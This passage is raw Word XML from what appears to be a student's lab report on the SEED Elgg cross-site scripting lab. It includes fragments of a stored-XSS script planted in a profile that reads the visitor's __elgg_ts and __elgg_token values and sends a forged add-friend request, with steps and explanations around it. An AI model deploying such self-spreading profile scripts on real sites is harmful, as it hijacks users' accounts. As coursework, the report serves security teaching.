          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>" + ts + token;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        //Create and send Ajax request to add friend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax=new XMLHttpRequest();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.open("GET",sendurl,true);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.setRequestHeader("Host","</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.xsslabelgg.com</w:t>
        </w:r>
      </w:hyperlink>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Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.send();</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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E373EEF" w14:textId="58765035" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEFE4FC" w14:textId="07306853" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671EE448" w14:textId="27289DD6" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3BE1FF" w14:textId="0059E9E1" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146E01FB" w14:textId="5B4EB839" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FE5A32" w14:textId="39D72D5F" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF45D12" w14:textId="4FA340EC" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FE7F37" w14:textId="726346E1" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A32723" w14:textId="3F215E3B" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E28C237" w14:textId="7CAFAE70" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC405A1" w14:textId="4D18F6EF" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C61BFE" w14:textId="382CD210" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A839425" w14:textId="14D70B3D" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D6D4B1" w14:textId="04AA4041" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126FA8B3" w14:textId="60A79F83" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199F3F2E" w14:textId="0D479258" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC5EA27" w14:textId="7CB485C6" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347CF232" w14:textId="386425FB" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7511E266" w14:textId="4A27698D" w:rsidR="00A22150" w:rsidRDefault="00A22150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9CDB27" w14:textId="1403C44A" w:rsidR="00BE71C1" w:rsidRDefault="00BE71C1" w:rsidP="00BE71C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q6.</w:t>
      </w:r>
      <w:r w:rsidR="00625191">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28A8C1" w14:textId="52FFB306" w:rsidR="0000470A" w:rsidRDefault="00BE71C1" w:rsidP="00BE71C1">
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidR="0000470A">
        <w:t xml:space="preserve">Log in as Alice. Add Samy as a friend to figure out what </w:t>
      </w:r>
      <w:r w:rsidR="003B44AA">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="0000470A">
        <w:t xml:space="preserve"> add-friend HTTP request look like.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38191433" w14:textId="31188863" w:rsidR="0000470A" w:rsidRDefault="00096A5F" w:rsidP="00BE71C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18FDEEA4" wp14:editId="329C3754">
            <wp:extent cx="5943600" cy="3399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99790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35591EEC" w14:textId="77777777" w:rsidR="000C3D03" w:rsidRDefault="000C3D03" w:rsidP="00BE71C1"/>
    <w:p w14:paraId="4A809AE0" w14:textId="32A5650C" w:rsidR="00BE71C1" w:rsidRDefault="000C3D03" w:rsidP="00BE71C1">
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="00BE71C1">
        <w:t>Log in as Samy and embed the JavaScript code into Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D4856" w14:textId="4AD40520" w:rsidR="00BE71C1" w:rsidRDefault="0000470A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0923890B" wp14:editId="7E868810">
            <wp:extent cx="5943600" cy="3414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r w:rsidR="00BE71C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D56DD9" w14:textId="0B4C5016" w:rsidR="009B3324" w:rsidRDefault="009B3324">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: Log in as Boby and visit Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A9158A" w14:textId="76805C97" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:t>Activity page before visiting Samy’s profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CFA2D" w14:textId="57C8A8F2" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CF55029" wp14:editId="6B237377">
            <wp:extent cx="5943600" cy="326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p>
    <w:p w14:paraId="48063A5C" w14:textId="35F122BD" w:rsidR="00B8556D" w:rsidRDefault="00B8556D"/>
    <w:p w14:paraId="7ECE83F3" w14:textId="19D7CCD7" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:t>Visit Sam’s profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA1F56" w14:textId="456F66BE" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB1E20E" wp14:editId="1E9B78E6">
            <wp:extent cx="5943600" cy="32505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56E4F16B" w14:textId="77777777" w:rsidR="00B8556D" w:rsidRDefault="00B8556D"/>
    <w:p w14:paraId="2054E3F4" w14:textId="4D79DB75" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Activity page after visiting Samy’s profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F0EEA" w14:textId="16F10015" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210DFFC0" wp14:editId="7EF9973D">
            <wp:extent cx="5943600" cy="33261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7F617188" w14:textId="482BEA4F" w:rsidR="00B8556D" w:rsidRDefault="00B8556D"/>
    <w:p w14:paraId="1E287877" w14:textId="092D2BAC" w:rsidR="009B3324" w:rsidRDefault="00B8556D">
      <w:r>
        <w:t>Another evidence to prove the attack was successful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F1112B" w14:textId="0F47ED42" w:rsidR="00B8556D" w:rsidRDefault="00B8556D">
      <w:r>
        <w:t xml:space="preserve">Samy added himself as a friend after I updated Samy’s “About Me” field, which could not be accomplished by clicking the “Add friend” button, because </w:t>
      </w:r>
      <w:r w:rsidR="008962E0">
        <w:t>there is no such option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565C728" w14:textId="3C961CA1" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="65D510D2" w14:textId="39F33B4E" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="4336F235" w14:textId="2DF6B10C" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="6BF2F25F" w14:textId="62491E9F" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="2A289A32" w14:textId="72B0413C" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="6EC3892A" w14:textId="5E71FF86" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="5664ADD7" w14:textId="6F6DFC1A" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="696D59F8" w14:textId="232167EC" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="539C80A1" w14:textId="35FF8DA9" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="27EA58D3" w14:textId="645E549E" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="11E1138F" w14:textId="02B8067B" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="68DD52A1" w14:textId="0DB7E24E" w:rsidR="005641F5" w:rsidRDefault="005641F5"/>
    <w:p w14:paraId="62717F75" w14:textId="5D81228B" w:rsidR="005641F5" w:rsidRDefault="00625191">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="005641F5">
        <w:t xml:space="preserve">6.3 </w:t>
      </w:r>
      <w:r w:rsidR="006B1EDD">
        <w:t>Dynamically retrieve the two user-specific fields used in constructing the HTTP request to add Samy as a friend.</w:t>
      </w:r>
      <w:r w:rsidR="00B95B04">
        <w:t xml:space="preserve"> They are needed because the fields vary across users and thus cannot be </w:t>
      </w:r>
      <w:r w:rsidR="00B733EC">
        <w:t>hardcoded</w:t>
      </w:r>
      <w:r w:rsidR="00B95B04">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67001E25" w14:textId="0A91685B" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="075D28A7" w14:textId="1BED4DFC" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="79D582AD" w14:textId="0F0327A7" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="0714EE70" w14:textId="490BFE14" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="6C1F125D" w14:textId="7F107676" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="359D96A9" w14:textId="79A9ACBB" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="7D546BE1" w14:textId="2ABB90F3" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="78B477A4" w14:textId="3E5EC5B7" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="54D3D020" w14:textId="5CE442E0" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="3BE670C1" w14:textId="12806CBD" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="63D85338" w14:textId="7CFD6CE6" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="2147A06D" w14:textId="53E24C97" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="2BA11246" w14:textId="5D46E3F7" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="03A46116" w14:textId="542D411D" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="6727D13F" w14:textId="7D93444F" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="15B09685" w14:textId="328B1DB2" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="1DFF040B" w14:textId="5B4ACD52" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="5FB3ACE3" w14:textId="0AFC621A" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="0F4C2690" w14:textId="77700EBE" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="20F28437" w14:textId="12C6E8C2" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="73DC057C" w14:textId="5ACB49ED" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="43DFE7E2" w14:textId="7FCF9A52" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="5A603818" w14:textId="3854D7BF" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="29E58ADD" w14:textId="660CF6E8" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="1A690C15" w14:textId="4B014763" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="0B1C7EEE" w14:textId="5F3E1B65" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="6CADCE9A" w14:textId="62DBCCC6" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="254BB840" w14:textId="62C5E8CE" w:rsidR="006666AD" w:rsidRDefault="00625191">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="006666AD">
        <w:t xml:space="preserve">6.4 </w:t>
      </w:r>
      <w:r w:rsidR="00EE6E8A">
        <w:t xml:space="preserve">No. </w:t>
      </w:r>
      <w:r w:rsidR="000D6297">
        <w:t>Because the malicious JavaScript code</w:t>
      </w:r>
      <w:r w:rsidR="00B4407A">
        <w:t xml:space="preserve"> we put into Samy’s profile</w:t>
      </w:r>
      <w:r w:rsidR="000D6297">
        <w:t xml:space="preserve"> contains many non-alphabetical characters essential for the correctness of the JavaScript code.</w:t>
      </w:r>
      <w:r w:rsidR="00A7654A">
        <w:t xml:space="preserve"> If they </w:t>
      </w:r>
      <w:r w:rsidR="0016123C">
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00A7654A">
        <w:t>re replaced with spaces</w:t>
      </w:r>
      <w:r w:rsidR="00CA4960">
        <w:t xml:space="preserve"> by the browser before making the request to change the “About Me” field to the server</w:t>
      </w:r>
      <w:r w:rsidR="00A7654A">
        <w:t xml:space="preserve">, the JavaScript </w:t>
      </w:r>
      <w:r w:rsidR="00641A0B">
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="000D5234">
        <w:t xml:space="preserve">stored on the server side </w:t>
      </w:r>
      <w:r w:rsidR="00A7654A">
        <w:t xml:space="preserve">won’t be valid and therefore </w:t>
      </w:r>
      <w:r w:rsidR="000D5234">
        <w:t xml:space="preserve">when the victim retrieves Samy’s profile from the server, the JavaScript code </w:t>
      </w:r>
      <w:r w:rsidR="00A7654A">
        <w:t>cannot be executed to launch a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE6A68" w14:textId="1444D41A" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="2F89A564" w14:textId="4E9AACCB" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="1EE3BBD1" w14:textId="21A91320" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="6E4F7010" w14:textId="788B13EA" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="0A87ECD3" w14:textId="1B951506" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="41544DC3" w14:textId="5A380FB9" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="33C01CE6" w14:textId="6C218496" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="5CE850F2" w14:textId="577647D4" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="6FAE69C7" w14:textId="111CE85D" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="1D0AEF03" w14:textId="477FF48C" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="12D56A04" w14:textId="2050D60D" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="583065D8" w14:textId="53C0075A" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="08E6F984" w14:textId="1FFEED0F" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="11D92375" w14:textId="5231EC29" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="603DC49F" w14:textId="5D921C09" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="494A72E4" w14:textId="482664B4" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="03F218FF" w14:textId="79B5ACAD" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="49AE51F9" w14:textId="3F8B914D" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="68521AA0" w14:textId="30D45C4B" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="5DE57FDD" w14:textId="48671A3A" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="3665EDDA" w14:textId="7F62824F" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="012E00CC" w14:textId="5CE13B65" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="47B06EC1" w14:textId="5695B7FB" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="48BFF82B" w14:textId="07A05740" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="2D3FEC9F" w14:textId="08655659" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1"/>
    <w:p w14:paraId="721BC3CC" w14:textId="52558DA4" w:rsidR="00DC36E1" w:rsidRDefault="00DC36E1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q7.1</w:t>
      </w:r>
      <w:r w:rsidR="00F75EB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727A286" w14:textId="35DCB92F" w:rsidR="00A37E4E" w:rsidRDefault="00A37E4E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>window.onload = function(){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //JavaScript code to access user name, user guid, Time Stamp __elgg_ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //and Security Token __elgg_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var userName=</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
